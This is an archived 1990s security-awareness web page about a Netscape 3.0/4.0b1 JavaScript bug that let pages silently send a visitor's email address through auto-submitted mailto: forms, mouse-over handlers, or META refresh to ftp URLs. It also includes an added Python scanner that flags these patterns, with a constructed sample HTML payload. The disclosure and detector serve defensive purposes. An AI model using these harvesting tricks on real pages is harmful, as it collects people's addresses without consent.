
Keep those cards and letters coming!

Completely safe link - trust me!

Since you have arrived at this page, you may have already touched a button like the one above that causes an email message to be sent, revealing your email address without your consent (if you are using version 3.0 or 4.0b1 of Netscape). The button can say absolutely anything on it, and you would only find out when it is too late, by watching the status bar at the bottom of the browser.

In fact, I could have snarfed your email address from this page, without you having to press a button or move your mouse. For an example of this, click here. In addition, I could trigger the browser to send mail when you pass your mouse over a link. For example, if you pass your mouse over the "Completely safe" link above, then it will send mail (watch the status bar at the bottom). Other examples can be found here (uses an invisible link in a frame) and here (uses a blue line).

These exploits use a javascript bug in Netscape Navigator versions 3.0 and 4.0b1. Note: this is a security problem in Netscape Javascript - not java. This bug seems to work in some version of the code if:

In addition, there is a setting for security of submitted forms by email that is by default set on. This setting can be changed by the user (a bad choice), but is inoperable against the kind of script used on this page under versions 3.0 and 4.0b1. This is not the same bug that existed in Netscape 2.0 and was fixed in version 2.02. At that time, Netscape wrote in their release notes:
A user's email addresses could have been inadvertently exposed to individuals without the user knowing it, compromising the user's privacy. Netscape Navigator 2.02 solves this privacy problem by limiting JavaScript's ability to automatically post mail or news from form elements. This ensures that user interaction is required to send mail or post news messages.
HUH? Strictly speaking, you do have to push a button, move your mouse over a link, or load a page. On the other hand, there is no evidence that this action will cause email to be sent. I guess the hits just keep on coming...

Even if you have Javascript turned off, there are still ways to capture your email address. For example, a page can use the META reload HTML feature to take the user to an ftp URL (perhaps in a hidden frame). There is a setting to turn off transmitting your email address as the password, but many people have it set. By monitoring the log files of an ftp server, you can capture email addresses. You can find other exploits in the DigiCrime home page.
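The patterns described above (a form whose action is a mailto: URL, a script or mouse-over handler that submits it without a click, and a META refresh that drops the browser onto an ftp: URL) can be flagged when reviewing a page's HTML. The scanner below is an added example for this page, not DigiCrime's own code; the hostnames in the constructed sample are placeholders.

```python
"""Flag HTML constructs that could leak a visitor's e-mail address through an
old browser: mailto: forms, handlers or scripts calling submit(), and META
refresh to ftp:// (anonymous ftp login once sent the e-mail as password).
Added example for this page; the sample HTML below is constructed."""
import re
from html.parser import HTMLParser


class LeakScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (kind, detail) tuples
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form" and a.get("action", "").lower().startswith("mailto:"):
            self.findings.append(("mailto-form", a["action"]))
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "0; URL=ftp://host/path"
            m = re.search(r"url\s*=\s*([^\s;]+)", a.get("content", ""), re.I)
            if m and m.group(1).lower().startswith("ftp://"):
                self.findings.append(("meta-refresh-ftp", m.group(1)))
        # event handlers (onMouseOver, onLoad, ...) that submit a form
        for k, v in a.items():
            if k.startswith("on") and "submit(" in v.lower():
                self.findings.append(("handler-submit", f"{k}={v}"))
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        # script bodies arrive here as raw text
        if self.in_script and "submit(" in data.lower():
            self.findings.append(("script-submit", data.strip()))


def scan(html):
    """Return the list of suspicious constructs found in the HTML string."""
    p = LeakScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample reproducing the page's described patterns (placeholder hosts).
SAMPLE = """<html><head>
<meta http-equiv="refresh" content="0; URL=ftp://ftp.example.invalid/pub/">
</head><body>
<form name="f" action="mailto:collector@example.invalid" method="post">
<input type="submit" value="Keep those cards and letters coming!">
</form>
<a href="#" onMouseOver="document.f.submit()">Completely safe link - trust me!</a>
<script>document.f.submit()</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE):
        print(f"{kind:18} {detail}")
```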

Your only protection against these attempts to gather email addresses is to turn off javascript capabilities in your browser. You don't need dancing bears anyway. Perhaps someday in the future these bundled packages will pay more attention to security and privacy rather than glitz and convenience. Competition sometimes has a way of bringing out the worst in software. Netscape has still not responded to my submission of a bug report, and they have apparently discontinued the bug bounty program.

Note: as of June 1997, this bug has been patched for quite a while, but from the logs it appears that approximately 20% of the people that visit this page still have their email address captured. Too many old browsers I guess...

DISCLAIMER: Unlike the spammers of the world, I don't collect these email addresses. I simply count how many people send us mail. After that RISKS note, I am now getting about a megabyte a day of unintentional mail. If you are thinking of using this trick in your own pages, remember that doing so is immoral.

This page has produced mail from the following versions of Netscape. I have not tested whether it is triggered automatically or results from pushing the button (both are bad), and whether it gives a warning to the user before submitting the form.

2.0 (X11; I; SunOS 5.5 sun4u)
2.01DT [de] (Win16; I)
2.02 (X11; I; IRIX64 6.2 IP21)
3.0 (Macintosh; I; 68K)
3.0 (Macintosh; I; PPC)
3.0 (Win16; I)
3.0 (Win95; I)
3.0 (Win95; I; 16bit)
3.0 (Win95; U)
3.0 (WinNT; I)
3.0 (X11; I; AIX 1)
3.0 (X11; I; FreeBSD 2.1.0-RELEASE i386)
3.0 (X11; I; HP-UX A.09.05 9000/712)
3.0 (X11; I; HP-UX A.09.05 9000/715)
3.0 (X11; I; Linux 2.0.18 i586)
3.0 (X11; I; Linux 2.0.20 i586)
3.0 (X11; I; Linux 2.1.15 i586)
3.0 (X11; I; Linux 1.3.98 i586)
3.0 (X11; U; SunOS 4.1.3 sun4c)
3.0 (X11; U; SunOS 5.5 sun4m)
3.0 (X11; I; SunOS 5.4 sun4m)
3.0 (X11; I; SunOS 5.5 sun4m)
3.0 (X11; I; SunOS 5.5.1 sun4m)
3.0 (X11; U; SunOS 4.1.3 sun4c)
3.0 (X11; U; SunOS 5.5 sun4m)
3.0C-NC320 (Win16; I)
3.0C-PBWG (Win95; U)
3.0Gold (Macintosh; I; PPC)
3.0Gold (Win16; I)
3.0Gold (Win16; U)
3.0Gold (Win95; I)
3.0Gold (Win95; U)
3.0Gold (WinNT; I)
3.0Gold (X11; I; SunOS 5.3 sun4d)
3.0Gold (X11; I; SunOS 5.4 sun4m)
3.0Gold (X11; I; OSF1 V3.2 alpha)
3.01 (Macintosh; I; PPC)
3.01 (Win16; I)
3.01 (Win95; I)
3.01 (Win95; U)
3.01 (WinNT; I)
3.01 (X11; I; Linux 2.0.18 i586)
3.01 (X11; I; Linux 2.0.27 i586)
3.01 (X11; I; SunOS 5.5.1 i86pc)
3.01 (X11; I; SunOS 5.5.1 sun4m)
3.01Gold (Win16; I)
3.01Gold (Win95; I)
3.01Gold (Win95; U)
3.01Gold (X11; I; SunOS 5.5.1 sun4m)
3.01Gold (WinNT; I)
4.0b1 (Win95; I)
4.0b1 (WinNT; I)
4.0b4 [en] (Win95; I)
4.0 [en] (Win95; I)
4.01 [en] (Win95; I)
4.01 [en] (WinNT; I)

Have a nice day - free of privacy.


DigiCrime is comically hosted by Southwest Cyberport.